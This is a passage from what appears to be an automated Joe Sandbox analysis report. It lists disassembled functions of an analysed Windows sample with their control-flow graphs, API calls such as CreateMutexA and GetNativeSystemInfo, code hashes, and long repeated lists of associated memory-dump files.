                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: 57825f2b61cf79d299c0f84e48ac872e922b5324e5ae0faf0638075d07cc15bc
                                                                                                                                                                                                                                                            • Instruction ID: 74762cddece3990d64df32803b1a48715275ea9db03f4f6e8b2855e6b009c236
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57825f2b61cf79d299c0f84e48ac872e922b5324e5ae0faf0638075d07cc15bc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED213AF1768201DBEB2477E8D886BFDB653DF81300F24491AE048D67D1CA7A49C183A7
                                                                                                                                                                                                                                                            Function 006BA34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 383 6ba34f-6ba35b 384 6ba35d-6ba36b 383->384 385 6ba371-6ba39a call 6cd663 383->385 384->385 386 6ba93a 384->386 391 6ba3c8-6ba916 call 6c80c0 385->391 392 6ba39c-6ba3a8 385->392 389 6ba953-6ba994 Sleep CreateMutexA 386->389 390 6ba93a call 6e6c6a 386->390 397 6ba9a7-6ba9a8 389->397 398 6ba996-6ba998 389->398 390->389 394 6ba3aa-6ba3b8 392->394 395 6ba3be-6ba3c5 call 6cd663 392->395 394->386 394->395 395->391 398->397 401 6ba99a-6ba9a5 398->401 401->397
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: 7aef79d155c51492b89453774550a449d500ab991a2adde46b998644eb7e834a
                                                                                                                                                                                                                                                            • Instruction ID: 87bb9a3a610fee13e0355afd3e7defad013afa6444cf2a7810b711cba0075580
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7aef79d155c51492b89453774550a449d500ab991a2adde46b998644eb7e834a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 772149B17542009BEB18ABACEC85BECB7A3EBD1311F24422DE408D77D4C77555C08362
                                                                                                                                                                                                                                                            Function 006B7D30 Relevance: 1.9, APIs: 1, Instructions: 426COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 535 6b7d30-6b7db2 call 6e40f0 539 6b7db8-6b7de0 call 6c7a00 call 6b5c10 535->539 540 6b8356-6b8373 call 6ccff1 535->540 547 6b7de2 539->547 548 6b7de4-6b7e06 call 6c7a00 call 6b5c10 539->548 547->548 553 6b7e0a-6b7e23 548->553 554 6b7e08 548->554 557 6b7e25-6b7e34 553->557 558 6b7e54-6b7e7f 553->558 554->553 559 6b7e4a-6b7e51 call 6cd663 557->559 560 6b7e36-6b7e44 557->560 561 6b7e81-6b7e90 558->561 562 6b7eb0-6b7ed1 558->562 559->558 560->559 565 6b8374 call 6e6c6a 560->565 567 6b7e92-6b7ea0 561->567 568 6b7ea6-6b7ead call 6cd663 561->568 563 6b7ed3-6b7ed5 GetNativeSystemInfo 562->563 564 6b7ed7-6b7edc 562->564 569 6b7edd-6b7ee6 563->569 564->569 576 6b8379-6b837f call 6e6c6a 565->576 567->565 567->568 568->562 574 6b7ee8-6b7eef 569->574 575 6b7f04-6b7f07 569->575 578 6b8351 574->578 579 6b7ef5-6b7eff 574->579 580 6b7f0d-6b7f16 575->580 581 6b82f7-6b82fa 575->581 578->540 583 6b834c 579->583 584 6b7f29-6b7f2c 580->584 585 6b7f18-6b7f24 580->585 581->578 586 6b82fc-6b8305 581->586 583->578 588 6b7f32-6b7f39 584->588 589 6b82d4-6b82d6 584->589 585->583 590 6b832c-6b832f 586->590 591 6b8307-6b830b 586->591 596 6b8019-6b82bd call 6c7a00 call 6b5c10 call 6c7a00 call 6b5c10 call 6b5d50 call 6c7a00 call 6b5c10 call 6b5730 call 6c7a00 call 6b5c10 call 6c7a00 call 6b5c10 call 6b5d50 call 6c7a00 call 6b5c10 call 6b5730 call 6c7a00 call 6b5c10 call 6c7a00 call 6b5c10 call 6b5d50 call 6c7a00 call 6b5c10 call 6b5730 call 6c7a00 call 6b5c10 call 6c7a00 call 6b5c10 call 6b5d50 call 6c7a00 call 6b5c10 call 6b5730 588->596 597 6b7f3f-6b7f9b call 6c7a00 call 6b5c10 call 6c7a00 call 6b5c10 call 6b5d50 588->597 594 6b82d8-6b82e2 589->594 595 6b82e4-6b82e7 589->595 592 6b833d-6b8349 590->592 593 6b8331-6b833b 590->593 598 6b830d-6b8312 591->598 599 6b8320-6b832a 591->599 592->583 593->578 594->583 595->578 601 6b82e9-6b82f5 595->601 634 6b82c3-6b82cc 596->634 620 6b7fa0-6b7fa7 597->620 598->599 603 6b8314-6b831e 598->603 599->578 601->583 603->578 622 6b7fab-6b7fcb call 6e8bbe 620->622 623 6b7fa9 620->623 630 6b7fcd-6b7fdc 622->630 631 6b8002-6b8004 622->631 623->622 635 6b7fde-6b7fec 630->635 636 6b7ff2-6b7fff call 6cd663 630->636 633 6b800a-6b8014 631->633 631->634 633->634 634->581 638 6b82ce 634->638 635->576 635->636 636->631 638->589
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006B7ED3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                                                                                                                            • Opcode ID: 6d577d59ec7ce5db2d4f5c6847815bd843f52ced9357546475a2941c01dbf35a
                                                                                                                                                                                                                                                            • Instruction ID: 2fa08b0a436bebcd3a3943f2277bc5b5e4a30e7cdd3426b5a97affdd525ca70b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d577d59ec7ce5db2d4f5c6847815bd843f52ced9357546475a2941c01dbf35a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CE114B0E002549BDB55BB6CCC077ED7A63AB41720F94429CE4166B3C2DB385ED18BCA
                                                                                                                                                                                                                                                            Function 006ED82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 834 6ed82f-6ed83a 835 6ed83c-6ed846 834->835 836 6ed848-6ed84e 834->836 835->836 837 6ed87c-6ed887 call 6e75f6 835->837 838 6ed867-6ed878 RtlAllocateHeap 836->838 839 6ed850-6ed851 836->839 843 6ed889-6ed88b 837->843 840 6ed87a 838->840 841 6ed853-6ed85a call 6e9dc0 838->841 839->838 840->843 841->837 847 6ed85c-6ed865 call 6e8e36 841->847 847->837 847->838
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,006EA813,00000001,00000364,00000006,000000FF,?,006EEE3F,?,00000004,00000000,?,?), ref: 006ED870
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
